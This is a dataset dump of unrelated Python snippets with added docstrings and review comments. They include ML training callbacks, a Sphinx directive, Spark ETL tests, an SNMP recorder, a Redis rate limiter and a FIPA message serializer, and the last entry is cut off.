code stringlengths 281 23.7M |
|---|
class GradientNormClipping(Callback['Trainer[BaseConfig, Any]']):
    """Callback that clips the gradient norm after each backward pass, when configured."""

    def on_backward_end(self, trainer: 'Trainer[BaseConfig, Any]') -> None:
        """Clip the gradients of the trainer's learnable parameters if a clip norm is set."""
        max_norm = trainer.config.training.clip_grad_norm
        if max_norm is None:
            # Gradient clipping disabled in the training config.
            return
        clip_gradient_norm(
            parameters=trainer.learnable_parameters,
            total_norm=trainer.total_gradient_norm,
            clip_norm=max_norm,
        )
class PyWinAutoLoader(Loader):
    """Import-system Loader that imports the target module with
    ``sys.coinit_flags`` forced to COM apartment-threaded mode.

    The flag must be in place *before* the real import happens, because the
    module being loaded (presumably pywinauto — confirm) reads it at import time.
    """

    def __init__(self):
        # Remember the pre-existing state of sys.coinit_flags so it could be restored.
        self._original_coinit_flags_defined = False
        self._original_coinit_flags = None

    def set_sys_coinit_flags(self):
        """Save the current ``sys.coinit_flags`` and force apartment threading."""
        self._original_coinit_flags_defined = hasattr(sys, 'coinit_flags')
        self._original_coinit_flags = getattr(sys, 'coinit_flags', None)
        sys.coinit_flags = pythoncom.COINIT_APARTMENTTHREADED

    def reset_sys_coinit_flags(self):
        """Restore ``sys.coinit_flags`` to its state before ``set_sys_coinit_flags``."""
        if (not self._original_coinit_flags_defined):
            # The attribute did not exist before; remove it again.
            del sys.coinit_flags
        else:
            sys.coinit_flags = self._original_coinit_flags

    def create_module(self, spec):
        """Import and return the target module with the COM init flag applied.

        NOTE(review): ``reset_sys_coinit_flags`` is never called here — presumably
        intentional so the flag stays set for the imported module; confirm.
        """
        self.set_sys_coinit_flags()
        # Imported for its side effect (loads the Qt compat layer first); the
        # name itself is unused.
        from koapy.compat import pyside2
        with warnings.catch_warnings():
            # The target module may emit UserWarnings at import time; silence them.
            warnings.simplefilter('ignore', UserWarning)
            module = importlib.import_module(spec.name)
        return module

    def exec_module(self, module):
        # The module was fully imported in create_module; nothing left to execute.
        pass
class GridItemCardDirective(SphinxDirective):
    """A grid item directive whose entire content is rendered as a card.

    Must be nested inside a ``grid-row`` component; the single optional
    argument is the card title.
    """

    has_content = True
    required_arguments = 0
    optional_arguments = 1  # optional card title
    final_argument_whitespace = True
    # columns/margin/padding/class-item apply to the grid item itself; all the
    # remaining options are forwarded to the card (see the filter in run()).
    option_spec = {'columns': item_columns_option, 'margin': margin_option, 'padding': padding_option, 'class-item': directives.class_option, 'width': make_choice(['auto', '25%', '50%', '75%', '100%']), 'text-align': text_align, 'img-background': directives.uri, 'img-top': directives.uri, 'img-bottom': directives.uri, 'img-alt': directives.unchanged, 'link': directives.uri, 'link-type': make_choice(['url', 'any', 'ref', 'doc']), 'link-alt': directives.unchanged, 'shadow': make_choice(['none', 'sm', 'md', 'lg']), 'class-card': directives.class_option, 'class-body': directives.class_option, 'class-title': directives.class_option, 'class-header': directives.class_option, 'class-footer': directives.class_option, 'class-img-top': directives.class_option, 'class-img-bottom': directives.class_option}

    def run(self) -> List[nodes.Node]:
        """Build the grid-item container node and the card node inside it."""
        # Warn (but still render) when nested outside a grid-row.
        if (not is_component(self.state_machine.node, 'grid-row')):
            LOGGER.warning(f"The parent of a 'grid-item' should be a 'grid-row' [{WARNING_TYPE}.grid]", location=(self.env.docname, self.lineno), type=WARNING_TYPE, subtype='grid')
        # Base item classes plus any user-supplied column/spacing/extra classes.
        column = create_component('grid-item', ((((['sd-col', 'sd-d-flex-row'] + self.options.get('columns', [])) + self.options.get('margin', [])) + self.options.get('padding', [])) + self.options.get('class-item', [])))
        # Forward only the card-related options to the card builder.
        card_options = {key: value for (key, value) in self.options.items() if (key in ['width', 'text-align', 'img-background', 'img-top', 'img-bottom', 'img-alt', 'link', 'link-type', 'link-alt', 'shadow', 'class-card', 'class-body', 'class-title', 'class-header', 'class-footer', 'class-img-top', 'class-img-bottom'])}
        if ('width' not in card_options):
            card_options['width'] = '100%'
        # The grid item already controls spacing, so the card gets no margin.
        card_options['margin'] = []
        card = CardDirective.create_card(self, self.arguments, card_options)
        column += card
        return [column]
class Submission(DB.Model):
    """A single form submission together with its JSON payload."""

    __tablename__ = 'submissions'

    id = DB.Column(DB.Integer, primary_key=True)
    submitted_at = DB.Column(DB.DateTime)
    form_id = DB.Column(DB.Integer, DB.ForeignKey('forms.id'), nullable=False)
    data = DB.Column(MutableDict.as_mutable(JSON))

    def __init__(self, form_id):
        """Create a submission for *form_id*, timestamped with the current UTC time."""
        self.submitted_at = datetime.datetime.utcnow()
        self.form_id = form_id

    def __repr__(self):
        identifier = self.id or 'with an id to be assigned'
        return '<Submission %s, form=%s, date=%s, keys=%s>' % (
            identifier,
            self.form_id,
            self.submitted_at.isoformat(),
            self.data.keys(),
        )
class TestInitialRun():
    """Tests of the ``initial_run`` ETL level of ``load_transactions_in_delta``.

    NOTE(review): the helper methods below take no ``self`` and are always
    invoked as ``TestInitialRun.<helper>(...)`` — they look like
    ``@staticmethod``s whose decorators were lost; confirm against the
    original file.
    """

    def initial_run(s3_data_bucket, load_source_tables=True, load_other_raw_tables=None, initial_copy=True):
        # Seed the Delta tables, then run the initial_run ETL level against the bucket.
        _load_tables_to_delta(s3_data_bucket, load_source_tables, load_other_raw_tables)
        call_params = ['load_transactions_in_delta', '--etl-level', 'initial_run', '--spark-s3-bucket', s3_data_bucket]
        if (not initial_copy):
            call_params.append('--no-initial-copy')
        call_command(*call_params)

    def verify_transaction_ids(spark, expected_transaction_id_lookup, expected_last_load=None):
        # Delta transaction_id_lookup must match the expected rows exactly.
        query = 'SELECT * FROM int.transaction_id_lookup ORDER BY transaction_id'
        delta_data = [row.asDict() for row in spark.sql(query).collect()]
        assert equal_datasets(expected_transaction_id_lookup, delta_data, '')
        # The Postgres sequence should sit at the max assigned id.  nextval()
        # advances the sequence, so it is reset with setval() below.
        with connection.cursor() as cursor:
            cursor.execute("SELECT nextval('transaction_id_seq')")
            max_transaction_id = cursor.fetchone()[0]
        if expected_transaction_id_lookup:
            assert (max_transaction_id == max([transaction['transaction_id'] for transaction in expected_transaction_id_lookup]))
        else:
            # Fresh sequence: first nextval() yields 1.
            assert (max_transaction_id == 1)
        # Undo the nextval() above so the sequence is unchanged by this check.
        with connection.cursor() as cursor:
            cursor.execute(f"SELECT setval('transaction_id_seq', {max_transaction_id}, false)")

    def verify_award_ids(spark, expected_award_id_lookup, expected_last_load=None):
        # Same checks as verify_transaction_ids, for the award_id_lookup table.
        query = 'SELECT * FROM int.award_id_lookup ORDER BY award_id, transaction_unique_id'
        delta_data = [row.asDict() for row in spark.sql(query).collect()]
        assert equal_datasets(expected_award_id_lookup, delta_data, '')
        with connection.cursor() as cursor:
            cursor.execute("SELECT nextval('award_id_seq')")
            max_award_id = cursor.fetchone()[0]
        if expected_award_id_lookup:
            assert (max_award_id == max([award['award_id'] for award in expected_award_id_lookup]))
        else:
            assert (max_award_id == 1)
        with connection.cursor() as cursor:
            cursor.execute(f"SELECT setval('award_id_seq', {max_award_id}, false)")

    def verify_lookup_info(spark, expected_transaction_id_lookup, expected_award_id_lookup, expected_last_load_transaction_id_lookup=None, expected_load_load_award_id_lookup=None):
        # Convenience wrapper verifying both lookup tables.
        TestInitialRun.verify_transaction_ids(spark, expected_transaction_id_lookup, expected_last_load_transaction_id_lookup)
        TestInitialRun.verify_award_ids(spark, expected_award_id_lookup, expected_load_load_award_id_lookup)

    def verify_raw_vs_int_tables(spark, table_name, col_names):
        # The raw and int copies must hold identical rows; MINUS in both
        # directions must therefore be empty.
        result = spark.sql(f'''
            SELECT {', '.join(col_names)} FROM int.{table_name}
            MINUS
            SELECT {', '.join(col_names)} FROM raw.{table_name}
        ''').collect()
        assert (len(result) == 0)
        result = spark.sql(f'''
            SELECT {', '.join(col_names)} FROM raw.{table_name}
            MINUS
            SELECT {', '.join(col_names)} FROM int.{table_name}
        ''').collect()
        assert (len(result) == 0)

    def verify(spark, expected_transaction_id_lookup, expected_award_id_lookup, expected_normalized_count=0, expected_fabs_count=0, expected_fpds_count=0, expected_last_load_transaction_id_lookup=None, expected_last_load_award_id_lookup=None, expected_last_load_transaction_normalized=None, expected_last_load_transaction_fabs=None, expected_last_load_transaction_fpds=None):
        # Full post-run verification: lookup tables, the delete-tracking table,
        # and the three transaction tables (counts + raw-vs-int equality).
        TestInitialRun.verify_lookup_info(spark, expected_transaction_id_lookup, expected_award_id_lookup, expected_last_load_transaction_id_lookup, expected_last_load_award_id_lookup)
        # award_ids_delete_modified should always be empty after initial_run.
        actual_count = spark.sql('SELECT COUNT(*) AS count from int.award_ids_delete_modified').collect()[0]['count']
        assert (actual_count == 0)
        for (table_name, expected_count, expected_last_load, col_names) in zip((f'transaction_{t}' for t in ('normalized', 'fabs', 'fpds')), (expected_normalized_count, expected_fabs_count, expected_fpds_count), (expected_last_load_transaction_normalized, expected_last_load_transaction_fabs, expected_last_load_transaction_fpds), (list(TRANSACTION_NORMALIZED_COLUMNS), TRANSACTION_FABS_COLUMNS, TRANSACTION_FPDS_COLUMNS)):
            actual_count = spark.sql(f'SELECT COUNT(*) AS count from int.{table_name}').collect()[0]['count']
            assert (actual_count == expected_count)
            if (expected_count > 0):
                # Compare raw vs int only if the raw table exists; a missing raw
                # table is tolerated (AnalysisException matching "not found").
                try:
                    spark.sql(f'SELECT 1 FROM raw.{table_name}')
                except pyspark.sql.utils.AnalysisException as e:
                    if re.match(f'Table or view not found: raw\.{table_name}', e.desc):
                        pass
                    else:
                        raise e
                else:
                    TestInitialRun.verify_raw_vs_int_tables(spark, table_name, col_names)

    # NOTE(review): this looks like a truncated
    # ``@pytest.mark.django_db(transaction=True)`` decorator lost in
    # extraction; as written it is a bare call that would raise NameError —
    # confirm against the original file.
    _db(transaction=True)
    def test_edge_cases_using_only_source_tables(self, spark, s3_unittest_data_bucket, hive_unittest_metastore_db):
        # With only empty source tables created, initial_run should leave the
        # lookup tables empty and record beginning-of-time last-load dates.
        raw_db = 'raw'
        spark.sql(f'create database if not exists {raw_db};')
        spark.sql(f'use {raw_db};')
        spark.sql(TABLE_SPEC['published_fabs']['delta_table_create_sql'].format(DESTINATION_TABLE='published_fabs', DESTINATION_DATABASE=raw_db, SPARK_S3_BUCKET=s3_unittest_data_bucket, DELTA_LAKE_S3_PATH=CONFIG.DELTA_LAKE_S3_PATH))
        spark.sql(TABLE_SPEC['detached_award_procurement']['delta_table_create_sql'].format(DESTINATION_TABLE='detached_award_procurement', DESTINATION_DATABASE=raw_db, SPARK_S3_BUCKET=s3_unittest_data_bucket, DELTA_LAKE_S3_PATH=CONFIG.DELTA_LAKE_S3_PATH))
        call_command('load_transactions_in_delta', '--etl-level', 'initial_run', '--spark-s3-bucket', s3_unittest_data_bucket, '--no-initial-copy')
        kwargs = {'expected_last_load_transaction_id_lookup': _BEGINNING_OF_TIME, 'expected_last_load_award_id_lookup': _BEGINNING_OF_TIME, 'expected_last_load_transaction_normalized': _BEGINNING_OF_TIME, 'expected_last_load_transaction_fabs': _BEGINNING_OF_TIME, 'expected_last_load_transaction_fpds': _BEGINNING_OF_TIME}
        TestInitialRun.verify(spark, [], [], **kwargs)
def record(oid, tag, value, **context):
    """Recording callback for the "numeric" SNMP simulation variation module.

    In single-pass mode it rewrites selected integer-typed OIDs into
    ``<tag>:numeric`` records carrying ``initial=...`` (and a default
    ``rate`` by type).  In multi-pass ("iterations") mode it samples each
    OID on two walks and derives the change ``rate`` from the samples.
    Control flow back to the recorder is signalled by raising
    ``error.NoDataNotification`` (emit nothing for this OID) or
    ``error.MoreDataNotification`` (schedule another walk).
    """
    # One-time module state initialisation.
    if ('started' not in moduleContext):
        moduleContext['started'] = time.time()
    if ('iterations' not in moduleContext):
        # At most one extra walk is ever scheduled.
        moduleContext['iterations'] = min(1, moduleContext['settings'].get('iterations', 0))
    iterations = moduleContext['settings'].get('iterations')
    if (not iterations):
        # --- Single-pass mode ---
        if (context['origValue'].tagSet not in INTEGER_TYPES):
            # Non-integer values pass through unchanged (hex form if available).
            if ('hextag' in context):
                tag = context['hextag']
            if ('hexvalue' in context):
                value = context['hexvalue']
            return (oid, tag, value)
        if (('taglist' not in moduleContext['settings']) or (tag not in moduleContext['settings']['taglist'])):
            # Integer type not selected for simulation: record verbatim.
            return (oid, tag, value)
        # Emit numeric-module settings with a default rate by type.
        value = ('initial=%s' % value)
        if (context['origValue'].tagSet == rfc1902.TimeTicks.tagSet):
            value += ',rate=100'
        elif (context['origValue'].tagSet == rfc1902.Integer.tagSet):
            value += ',rate=0'
        return (oid, (tag + ':numeric'), value)
    # --- Multi-pass mode ---
    if (oid not in moduleContext):
        # First sighting of this OID: set up its per-OID settings.
        settings = {'initial': value}
        if (context['origValue'].tagSet == rfc1902.TimeTicks.tagSet):
            settings['rate'] = 100
        elif (context['origValue'].tagSet == rfc1902.Integer.tagSet):
            settings['rate'] = 0
        if ('addon' in moduleContext['settings']):
            # Merge user-supplied "key=value" addon options.
            # NOTE(review): ``split`` appears to be the function form of
            # str.split (e.g. a Py2-era ``string.split`` import) — confirm.
            settings.update(dict([split(x, '=') for x in moduleContext['settings']['addon']]))
        moduleContext[oid] = {}
        moduleContext[oid]['settings'] = settings
    if moduleContext['iterations']:
        # First walk: stash value/time per OID; when the walk ends, wait out
        # the remainder of the sampling period and request another walk.
        if context['stopFlag']:
            log.info(('numeric: %s iterations remaining' % moduleContext['iterations']))
            moduleContext['iterations'] -= 1
            moduleContext['started'] = time.time()
            # NOTE(review): ``started`` was just reset, so ``running`` is ~0 and
            # the full ``period`` is always waited — confirm this is intended.
            running = (time.time() - moduleContext['started'])
            wait = max(0, (float(moduleContext['settings']['period']) - running))
            raise error.MoreDataNotification(period=wait)
        else:
            moduleContext[oid]['time'] = time.time()
            moduleContext[oid]['value'] = context['origValue']
            # NOTE(review): these membership tests look at moduleContext[oid]
            # (which never has these keys yet) rather than ``context`` — looks
            # like a bug; confirm against upstream (snmpsim) which checks
            # ``'hexvalue' in context``.
            if ('hexvalue' in moduleContext[oid]):
                moduleContext[oid]['hexvalue'] = context['hexvalue']
            if ('hextag' in moduleContext[oid]):
                moduleContext[oid]['hextag'] = context['hextag']
            raise error.NoDataNotification()
    else:
        # Final walk: derive per-second rate from the two samples and emit.
        if context['stopFlag']:
            raise error.NoDataNotification()
        if ('value' in moduleContext[oid]):
            if (context['origValue'].tagSet not in INTEGER_TYPES):
                # Non-integer values recorded verbatim (hex form if stashed).
                if ('hextag' in moduleContext[oid]):
                    tag = moduleContext[oid]['hextag']
                if ('hexvalue' in moduleContext[oid]):
                    value = moduleContext[oid]['hexvalue']
                return (oid, tag, value)
            if (tag not in moduleContext['settings']['taglist']):
                # Not a simulated type: emit the first-walk value unchanged.
                return (oid, tag, moduleContext[oid]['value'])
            # rate = (second sample - first sample) / elapsed seconds.
            diff = (int(context['origValue']) - int(moduleContext[oid]['value']))
            runtime = (time.time() - moduleContext[oid]['time'])
            moduleContext[oid]['settings']['rate'] = (diff / runtime)
            tag += ':numeric'
            value = ','.join([('%s=%s' % (k, v)) for (k, v) in moduleContext[oid]['settings'].items()])
            return (oid, tag, value)
        else:
            # OID did not appear on the first walk: emit nothing.
            raise error.NoDataNotification()
def _rule_match(analysis_plugin, filename, expected_rule_name, expected_number_of_rules=1):
    """Run *analysis_plugin* on a test file and assert on the matched rules."""
    test_file = FileObject(file_path=os.path.join(TEST_DATA_DIR, filename))
    analysis_plugin.process_object(test_file)
    results = test_file.processed_analysis[analysis_plugin.NAME]
    # One entry of the results dict is the summary, not a rule match.
    number_of_rules = len(results) - 1
    assert number_of_rules == expected_number_of_rules, (
        f'Number of results is {number_of_rules} but should be {expected_number_of_rules}'
    )
    if expected_rule_name is not None:
        assert expected_rule_name in results, f'Expected rule {expected_rule_name} missing'
def test_parse_schema_includes_hint_with_list():
    """parse_schema on a list of schemas should mark each one as parsed.

    Bug fix: the original docstring was a broken, unterminated string
    literal (a lone quote), which is a syntax error.
    """
    schema = [{'type': 'record', 'name': 'test_parse_schema_includes_hint_with_list_1', 'doc': 'blah', 'fields': [{'name': 'field1', 'type': 'string', 'default': ''}]}, {'type': 'record', 'name': 'test_parse_schema_includes_hint_with_list_2', 'doc': 'blah', 'fields': [{'name': 'field2', 'type': 'string', 'default': ''}]}]
    parsed_schema = parse_schema(schema)
    for s in parsed_schema:
        # fastavro adds this marker to every schema it has already parsed.
        assert '__fastavro_parsed' in s
class RateLimiter():
    """Fixed-window rate limiter backed by Redis counters."""

    # Extra TTL (seconds) added beyond the window length so counters expire
    # shortly after they can no longer be consulted.
    EXPIRE_AFTER_PERIOD_SECONDS: int = 500

    def build_redis_key(self, current_seconds: int, request: RateLimiterRequest) -> str:
        """Return the Redis key for the fixed window containing *current_seconds*."""
        # Truncate the timestamp to the start of the current window.
        fixed_time_filter = (int((current_seconds / request.period.factor)) * request.period.factor)
        redis_key = f'{request.key}:{request.period.label}:{fixed_time_filter}'
        return redis_key

    def increment_usage(self, redis: FidesopsRedis, current_seconds: int, requests: List[RateLimiterRequest]) -> List[int]:
        """Increment usage for every request's current window; return the new counts."""
        pipe = redis.pipeline()
        for request in requests:
            redis_key = self.build_redis_key(current_seconds=current_seconds, request=request)
            pipe.incrby(redis_key, 1)
            # Refresh the TTL: window length plus a safety margin.
            pipe.expire(redis_key, (request.period.factor + self.EXPIRE_AFTER_PERIOD_SECONDS))
        response = pipe.execute()
        found_bucket_usages = []
        # Each request produced two pipeline replies (incrby, expire); the
        # incrby result sits at every even index.
        for (index, request) in enumerate(requests):
            found_bucket_usages.append(response[(index * 2)])
        return found_bucket_usages

    def decrement_usage(self, redis: FidesopsRedis, current_seconds: int, requests: List[RateLimiterRequest]) -> None:
        """Undo a previous increment for every request's current window."""
        pipe = redis.pipeline()
        for request in requests:
            redis_key = self.build_redis_key(current_seconds=current_seconds, request=request)
            pipe.decrby(redis_key, 1)
        pipe.execute()

    def limit(self, requests: List[RateLimiterRequest], timeout_seconds: int=30) -> None:
        """Block until all rate limits admit *requests*, or raise on timeout.

        Degrades gracefully (no limiting) when Redis is unreachable.
        Raises RateLimiterTimeoutException if the limits stay breached for
        longer than *timeout_seconds*.
        """
        try:
            redis: FidesopsRedis = get_cache()
        except RedisConnectionError as exc:
            # Best effort: a broken cache must not block the request.
            logger.warning('Failed to connect to redis, skipping limiter for requests {}. {}', ','.join((str(r) for r in requests)), exc)
            return
        start_time = time.time()
        while ((time.time() - start_time) < timeout_seconds):
            current_seconds = int(time.time())
            bucket_usages = self.increment_usage(redis=redis, current_seconds=current_seconds, requests=requests)
            breached_requests = [request for (index, request) in enumerate(requests) if (bucket_usages[index] > request.rate_limit)]
            if breached_requests:
                # Roll back our increments before retrying so failed attempts
                # do not count against the limit.
                logger.debug('Breached rate limits: {}. Decrementing usage and trying again.', ','.join((str(r) for r in breached_requests)))
                self.decrement_usage(redis=redis, current_seconds=current_seconds, requests=requests)
                time.sleep(0.1)
            else:
                return
        # NOTE(review): if timeout_seconds <= 0 the loop never runs and
        # ``breached_requests`` is unbound here (NameError) — confirm intended.
        error_message = f"Timeout waiting for rate limiter. Last breached requests: {','.join((str(r) for r in breached_requests))}"
        logger.error(error_message)
        raise RateLimiterTimeoutException(error_message)
class FipaSerializer(Serializer):
    """Serializer for the FIPA protocol: FipaMessage <-> protobuf bytes.

    Fix: ``encode``/``decode`` had no ``self`` parameter and no decorator —
    they are restored as ``@staticmethod``s so that both
    ``FipaSerializer.encode(msg)`` and instance calls work.
    """

    @staticmethod
    def encode(msg: Message) -> bytes:
        """Encode *msg* into bytes via the protocol's protobuf schema.

        Raises ValueError for an unknown performative.
        """
        msg = cast(FipaMessage, msg)
        message_pb = ProtobufMessage()
        dialogue_message_pb = DialogueMessage()
        fipa_msg = fipa_pb2.FipaMessage()
        # Dialogue envelope fields.
        dialogue_message_pb.message_id = msg.message_id
        dialogue_reference = msg.dialogue_reference
        dialogue_message_pb.dialogue_starter_reference = dialogue_reference[0]
        dialogue_message_pb.dialogue_responder_reference = dialogue_reference[1]
        dialogue_message_pb.target = msg.target
        # Performative-specific payload.
        performative_id = msg.performative
        if (performative_id == FipaMessage.Performative.CFP):
            performative = fipa_pb2.FipaMessage.Cfp_Performative()
            query = msg.query
            Query.encode(performative.query, query)
            fipa_msg.cfp.CopyFrom(performative)
        elif (performative_id == FipaMessage.Performative.PROPOSE):
            performative = fipa_pb2.FipaMessage.Propose_Performative()
            proposal = msg.proposal
            Description.encode(performative.proposal, proposal)
            fipa_msg.propose.CopyFrom(performative)
        elif (performative_id == FipaMessage.Performative.ACCEPT_W_INFORM):
            performative = fipa_pb2.FipaMessage.Accept_W_Inform_Performative()
            info = msg.info
            performative.info.update(info)
            fipa_msg.accept_w_inform.CopyFrom(performative)
        elif (performative_id == FipaMessage.Performative.MATCH_ACCEPT_W_INFORM):
            performative = fipa_pb2.FipaMessage.Match_Accept_W_Inform_Performative()
            info = msg.info
            performative.info.update(info)
            fipa_msg.match_accept_w_inform.CopyFrom(performative)
        elif (performative_id == FipaMessage.Performative.INFORM):
            performative = fipa_pb2.FipaMessage.Inform_Performative()
            info = msg.info
            performative.info.update(info)
            fipa_msg.inform.CopyFrom(performative)
        elif (performative_id == FipaMessage.Performative.ACCEPT):
            performative = fipa_pb2.FipaMessage.Accept_Performative()
            fipa_msg.accept.CopyFrom(performative)
        elif (performative_id == FipaMessage.Performative.DECLINE):
            performative = fipa_pb2.FipaMessage.Decline_Performative()
            fipa_msg.decline.CopyFrom(performative)
        elif (performative_id == FipaMessage.Performative.MATCH_ACCEPT):
            performative = fipa_pb2.FipaMessage.Match_Accept_Performative()
            fipa_msg.match_accept.CopyFrom(performative)
        elif (performative_id == FipaMessage.Performative.END):
            performative = fipa_pb2.FipaMessage.End_Performative()
            fipa_msg.end.CopyFrom(performative)
        else:
            raise ValueError('Performative not valid: {}'.format(performative_id))
        # Nest the FIPA payload inside the dialogue envelope and serialize.
        dialogue_message_pb.content = fipa_msg.SerializeToString()
        message_pb.dialogue_message.CopyFrom(dialogue_message_pb)
        message_bytes = message_pb.SerializeToString()
        return message_bytes

    @staticmethod
    def decode(obj: bytes) -> Message:
        """Decode *obj* back into a FipaMessage.

        Raises ValueError for an unknown performative.
        """
        message_pb = ProtobufMessage()
        fipa_pb = fipa_pb2.FipaMessage()
        message_pb.ParseFromString(obj)
        # Dialogue envelope fields.
        message_id = message_pb.dialogue_message.message_id
        dialogue_reference = (message_pb.dialogue_message.dialogue_starter_reference, message_pb.dialogue_message.dialogue_responder_reference)
        target = message_pb.dialogue_message.target
        # Nested FIPA payload; the set oneof field identifies the performative.
        fipa_pb.ParseFromString(message_pb.dialogue_message.content)
        performative = fipa_pb.WhichOneof('performative')
        performative_id = FipaMessage.Performative(str(performative))
        performative_content = {}
        if (performative_id == FipaMessage.Performative.CFP):
            pb2_query = fipa_pb.cfp.query
            query = Query.decode(pb2_query)
            performative_content['query'] = query
        elif (performative_id == FipaMessage.Performative.PROPOSE):
            pb2_proposal = fipa_pb.propose.proposal
            proposal = Description.decode(pb2_proposal)
            performative_content['proposal'] = proposal
        elif (performative_id == FipaMessage.Performative.ACCEPT_W_INFORM):
            info = fipa_pb.accept_w_inform.info
            info_dict = dict(info)
            performative_content['info'] = info_dict
        elif (performative_id == FipaMessage.Performative.MATCH_ACCEPT_W_INFORM):
            info = fipa_pb.match_accept_w_inform.info
            info_dict = dict(info)
            performative_content['info'] = info_dict
        elif (performative_id == FipaMessage.Performative.INFORM):
            info = fipa_pb.inform.info
            info_dict = dict(info)
            performative_content['info'] = info_dict
        elif (performative_id == FipaMessage.Performative.ACCEPT):
            pass  # no content
        elif (performative_id == FipaMessage.Performative.DECLINE):
            pass  # no content
        elif (performative_id == FipaMessage.Performative.MATCH_ACCEPT):
            pass  # no content
        elif (performative_id == FipaMessage.Performative.END):
            pass  # no content
        else:
            raise ValueError('Performative not valid: {}.'.format(performative_id))
        # NOTE(review): the oneof field-name string ``performative`` is passed
        # rather than ``performative_id`` — FipaMessage presumably coerces it;
        # confirm against upstream before changing.
        return FipaMessage(message_id=message_id, dialogue_reference=dialogue_reference, target=target, performative=performative, **performative_content)
def setUpModule():
    """Create the practices and import logs shared by all tests in this module."""
    practices = (
        ('N84014', 'AINSDALE VILLAGE SURGERY'),
        ('P84034', 'BARLOW MEDICAL CENTRE'),
        ('Y02229', 'ADDACTION NUNEATON'),
    )
    for code, name in practices:
        Practice.objects.create(code=code, name=name)
    ImportLog.objects.create(current_at='2039-12-01', category='patient_list_size')
    ImportLog.objects.create(current_at=PRESCRIBING_DATE, category='prescribing')
def flatten_groups(*geometries: GeometryType, flatten_nonunion_type: bool = False) -> GeometryType:
    """Yield leaf geometries, recursively expanding geometry groups.

    Clip operations are expanded too when they are unions, or always when
    *flatten_nonunion_type* is set; anything else is yielded unchanged.
    """
    for geom in geometries:
        if isinstance(geom, base.GeometryGroup):
            # Expand the group's members in place.
            yield from flatten_groups(*geom.geometries, flatten_nonunion_type=flatten_nonunion_type)
            continue
        expandable_clip = isinstance(geom, base.ClipOperation) and (
            flatten_nonunion_type or geom.operation == 'union'
        )
        if expandable_clip:
            yield from flatten_groups(geom.geometry_a, geom.geometry_b, flatten_nonunion_type=flatten_nonunion_type)
        else:
            yield geom
class TestMergePipeline():
    """Tests that MergePipeline output matches its component pipelines.

    Fix: the parametrize line was a truncated ``.parametrize('data', datas)``
    (a syntax error); restored as ``@pytest.mark.parametrize``.
    """

    @pytest.mark.parametrize('data', datas)
    def test_fit_execute_simple(self, data):
        """Merged results must equal the per-pipeline results, column by column."""
        columns = ['revenue', 'netinc', 'ncf', 'ebitda', 'debt', 'fcf']
        f1 = QuarterlyFeatures(data_key='quarterly', columns=columns, quarter_counts=[2, 10], max_back_quarter=1)
        target1 = QuarterlyTarget(data_key='quarterly', col='marketcap', quarter_shift=0)
        target2 = QuarterlyTarget(data_key='quarterly', col='marketcap', quarter_shift=(- 1))
        model = lgbm.sklearn.LGBMRegressor()
        pipeline1 = Pipeline(data=data, feature=f1, target=target1, model=model, out_name='p1')
        pipeline2 = Pipeline(data=data, feature=f1, target=target2, model=model, out_name='p2')
        pipeline3 = LoadingPipeline(data['quarterly'], ['ticker', 'date', 'marketcap'])
        # Fit and execute via the merged pipeline first.
        merge1 = MergePipeline(pipeline_list=[pipeline1, pipeline2, pipeline3], execute_merge_on=['ticker', 'date'])
        merge1.fit(tickers)
        df_m1 = merge1.execute(tickers)
        # Now fit the component pipelines individually and compare outputs.
        pipeline1.fit(tickers)
        pipeline2.fit(tickers)
        # NOTE(review): merge2 is created but never executed (df_m2/df_m3 come
        # from merge1) — confirm whether that is intentional.
        merge2 = MergePipeline(pipeline_list=[pipeline1, pipeline2, pipeline3], execute_merge_on=['ticker', 'date'])
        df1 = pipeline1.execute(tickers)
        df2 = pipeline2.execute(tickers)
        df3 = pipeline3.execute(tickers)
        df_m2 = merge1.execute(tickers)
        df_m3 = merge1.execute(tickers, 2)
        assert (type(df_m1) == pd.DataFrame)
        assert (type(df_m2) == pd.DataFrame)
        assert (len(df_m1) == len(df1))
        assert (len(df_m2) == len(df1))
        np.testing.assert_array_equal(df_m1.columns, ['ticker', 'date', 'p1', 'p2', 'marketcap'])
        np.testing.assert_array_equal(df_m2.columns, ['ticker', 'date', 'p1', 'p2', 'marketcap'])
        np.testing.assert_array_equal(df_m3.columns, ['ticker', 'date', 'p1', 'p2', 'marketcap'])
        np.testing.assert_array_equal(df1['p1'], df_m1['p1'])
        np.testing.assert_array_equal(df2['p2'], df_m1['p2'])
        np.testing.assert_array_equal(df_m1['p1'], df_m2['p1'])
        np.testing.assert_array_equal(df_m1['p2'], df_m2['p2'])
        np.testing.assert_array_equal(df_m2['p1'], df_m3['p1'])
        np.testing.assert_array_equal(df_m2['p2'], df_m3['p2'])
class TestUSSPP(unittest.TestCase):
    """Tests for the US_SPP parser, driven by a pickled snapshot of the SPP feed."""

    def test_fetch_production(self):
        """fetch_production converts the mocked feed into well-formed datapoints."""
        filename = 'parsers/test/mocks/US_SPP_Gen_Mix.pkl'
        fake_data = read_pickle(filename)
        with LogCapture() as log:
            with patch('parsers.US_SPP.get_data') as gd:
                gd.return_value = fake_data
                data = US_SPP.fetch_production(logger=logging.getLogger('test'))
                # Most recent datapoint in the returned list.
                datapoint = data[(- 1)]
        with self.subTest():
            self.assertIsInstance(data, list)
        with self.subTest():
            self.assertEqual(len(data), 23)
        with self.subTest():
            self.assertEqual(round(datapoint['production']['unknown'], 2), 33.1)
        with self.subTest():
            # Timestamps from the feed must be converted to aware UTC datetimes.
            expected_dt = get(datetime(2018, 7, 27, 11, 45), 'UTC').datetime
            self.assertEqual(datapoint['datetime'], expected_dt)
        with self.subTest():
            self.assertEqual(datapoint['source'], 'spp.org')
        with self.subTest():
            self.assertEqual(datapoint['zoneKey'], 'US-SPP')
        with self.subTest():
            self.assertIsInstance(datapoint['storage'], dict)

    def test_SPP_logging(self):
        """An unrecognised feed column must be reported as a warning."""
        filename = 'parsers/test/mocks/US_SPP_Gen_Mix.pkl'
        fake_data = read_pickle(filename)
        with LogCapture() as log:
            with patch('parsers.US_SPP.get_data') as gd:
                gd.return_value = fake_data
                data = US_SPP.fetch_production(logger=logging.getLogger('test'))
                log.check(('test', 'WARNING', "New column 'Flux Capacitor' present in US-SPP data source."))
# Fix: the source had a truncated ``.parametrize(...)`` line (a syntax error);
# restored as ``@pytest.mark.parametrize``.
@pytest.mark.parametrize(
    'bytecode,link_refs,attr_dict,expected',
    (
        # Single library, single offset.
        (bytearray(60), [{'length': 20, 'name': 'SafeSendLib', 'offsets': [1]}], {'SafeSendLib': SAFE_SEND_CANON}, ((b'\x00' + SAFE_SEND_CANON) + bytearray(39))),
        # Single library linked at two offsets.
